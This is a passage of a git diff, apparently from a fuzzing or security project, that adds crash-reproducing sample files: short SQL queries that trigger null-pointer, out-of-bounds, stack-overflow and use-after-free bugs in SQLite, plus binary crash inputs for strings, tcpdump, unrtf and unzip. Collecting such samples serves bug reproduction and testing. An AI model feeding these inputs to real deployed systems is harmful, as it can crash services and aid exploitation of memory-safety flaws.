+++ b/docs/vuln_samples/sqlite-null-ptr4.sql
@@ -0,0 +1 @@
+select n()AND+#00;
diff --git a/docs/vuln_samples/sqlite-null-ptr5.sql b/docs/vuln_samples/sqlite-null-ptr5.sql
new file mode 100644
index 00000000..7bbb7856
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr5.sql
@@ -0,0 +1 @@
+select e.*,0 from(s,(L))e;
diff --git a/docs/vuln_samples/sqlite-null-ptr6.sql b/docs/vuln_samples/sqlite-null-ptr6.sql
new file mode 100644
index 00000000..2eb04bc4
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr6.sql
@@ -0,0 +1 @@
+PRAGMA encoding='UTF16';CREATE VIRTUAL TABLE È USING s;
\ No newline at end of file
diff --git a/docs/vuln_samples/sqlite-null-ptr7.sql b/docs/vuln_samples/sqlite-null-ptr7.sql
new file mode 100644
index 00000000..57ab12c5
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr7.sql
@@ -0,0 +1 @@
+CREATE VIRTUAL TABLE t USING fts4(tokenize=);
diff --git a/docs/vuln_samples/sqlite-null-ptr8.sql b/docs/vuln_samples/sqlite-null-ptr8.sql
new file mode 100644
index 00000000..4d5db064
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr8.sql
@@ -0,0 +1 @@
+CREATE TABLE p(a UNIQUE,PRIMARY KEY('a'))WITHOUT rowid;
diff --git a/docs/vuln_samples/sqlite-null-ptr9.sql b/docs/vuln_samples/sqlite-null-ptr9.sql
new file mode 100644
index 00000000..0ae836a2
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr9.sql
@@ -0,0 +1 @@
+CREATE TABLE t0(z);WITH d(x)AS(SELECT*UNION SELECT 0)INSERT INTO t0 SELECT 0 FROM d;
diff --git a/docs/vuln_samples/sqlite-oob-read.sql b/docs/vuln_samples/sqlite-oob-read.sql
new file mode 100644
index 00000000..4fe53b4f
--- /dev/null
+++ b/docs/vuln_samples/sqlite-oob-read.sql
@@ -0,0 +1 @@
+create table t0(‰ DEFAULT(0=0)NOT/**/NULL);REPLACE into t0 select'';
\ No newline at end of file
diff --git a/docs/vuln_samples/sqlite-oob-write.sql b/docs/vuln_samples/sqlite-oob-write.sql
new file mode 100644
index 00000000..9b2c427d
--- /dev/null
+++ b/docs/vuln_samples/sqlite-oob-write.sql
@@ -0,0 +1,6 @@
+CREATE VIRTUAL TABLE t0 USING fts4(x,order=DESC);
+INSERT INTO t0(docid,x)VALUES(-1E0,'0(o');
+INSERT INTO t0 VALUES('');
+INSERT INTO t0 VALUES('');
+INSeRT INTO t0 VALUES('o');
+SELECT docid FROM t0 WHERE t0 MATCH'"0*o"';
diff --git a/docs/vuln_samples/sqlite-stack-buf-overflow.sql b/docs/vuln_samples/sqlite-stack-buf-overflow.sql
new file mode 100644
index 00000000..4be57fd0
--- /dev/null
+++ b/docs/vuln_samples/sqlite-stack-buf-overflow.sql
@@ -0,0 +1 @@
+SELECT printf('%*.*f',90000||006000000&6600000000,00000000000000000909000000000000.0000000000000000)""WHERE"">"";
diff --git a/docs/vuln_samples/sqlite-stack-exhaustion.sql b/docs/vuln_samples/sqlite-stack-exhaustion.sql
new file mode 100644
index 00000000..6031a93b
--- /dev/null
+++ b/docs/vuln_samples/sqlite-stack-exhaustion.sql
@@ -0,0 +1 @@
+CREATE VIRTUAL TABLE t0 USING fts4(content=t0);
diff --git a/docs/vuln_samples/sqlite-unint-mem.sql b/docs/vuln_samples/sqlite-unint-mem.sql
new file mode 100644
index 00000000..83b77112
--- /dev/null
+++ b/docs/vuln_samples/sqlite-unint-mem.sql
@@ -0,0 +1 @@
+REATE VIRTUAL TABLE t0 USING fts4(prefix=0);INSERT INTO t0 VALUES(0);
diff --git a/docs/vuln_samples/sqlite-use-after-free.sql b/docs/vuln_samples/sqlite-use-after-free.sql
new file mode 100644
index 00000000..4083ee64
--- /dev/null
+++ b/docs/vuln_samples/sqlite-use-after-free.sql
@@ -0,0 +1 @@
+create table t(s);PRAGMA writable_schema=ON;UPDATE sqlite_master SET sql='ANALYZE;CREATE VIRTUAL TABLE t USING fts3;DROP TABLE t;DROP TABLE EXISTS t';PRAGMA r;SAVEPOINT T;ANALYZE;ROLLBACK;SAVEPOINT E;DROP TABLE IF EXISTS t;
diff --git a/docs/vuln_samples/strings-bfd-badptr.elf b/docs/vuln_samples/strings-bfd-badptr.elf
new file mode 100644
index 00000000..1df629b6
--- /dev/null
+++ b/docs/vuln_samples/strings-bfd-badptr.elf
Binary files differdiff --git a/docs/vuln_samples/strings-bfd-badptr2.elf b/docs/vuln_samples/strings-bfd-badptr2.elf
new file mode 100644
index 00000000..085d3c11
--- /dev/null
+++ b/docs/vuln_samples/strings-bfd-badptr2.elf
Binary files differdiff --git a/docs/vuln_samples/strings-stack-overflow b/docs/vuln_samples/strings-stack-overflow
new file mode 100644
index 00000000..a673b273
--- /dev/null
+++ b/docs/vuln_samples/strings-stack-overflow
@@ -0,0 +1,3 @@
+$$@$$$@$o
+S…Ôo
+S…Ô
\ No newline at end of file
diff --git a/docs/vuln_samples/strings-unchecked-ctr.elf b/docs/vuln_samples/strings-unchecked-ctr.elf
new file mode 100644
index 00000000..dc531d5c
--- /dev/null
+++ b/docs/vuln_samples/strings-unchecked-ctr.elf
Binary files differdiff --git a/docs/vuln_samples/tcpdump-arp-crash.pcap b/docs/vuln_samples/tcpdump-arp-crash.pcap
new file mode 100644
index 00000000..40d199a2
--- /dev/null
+++ b/docs/vuln_samples/tcpdump-arp-crash.pcap
Binary files differdiff --git a/docs/vuln_samples/tcpdump-ppp-crash.pcap b/docs/vuln_samples/tcpdump-ppp-crash.pcap
new file mode 100644
index 00000000..b6831155
--- /dev/null
+++ b/docs/vuln_samples/tcpdump-ppp-crash.pcap
Binary files differdiff --git a/docs/vuln_samples/unrtf-arbitrary-read.rtf b/docs/vuln_samples/unrtf-arbitrary-read.rtf
new file mode 100644
index 00000000..b7f4c283
--- /dev/null
+++ b/docs/vuln_samples/unrtf-arbitrary-read.rtf
Binary files differdiff --git a/docs/vuln_samples/unzip-t-mem-corruption.zip b/docs/vuln_samples/unzip-t-mem-corruption.zip
new file mode 100644
index 00000000..d34fa39e
--- /dev/null
+++ b/docs/vuln_samples/unzip-t-mem-corruption.zip
Binary files differ
generated by cgit-pink 1.4.1 (git 2.36.1) at 2025-10-24 14:43:42 +0000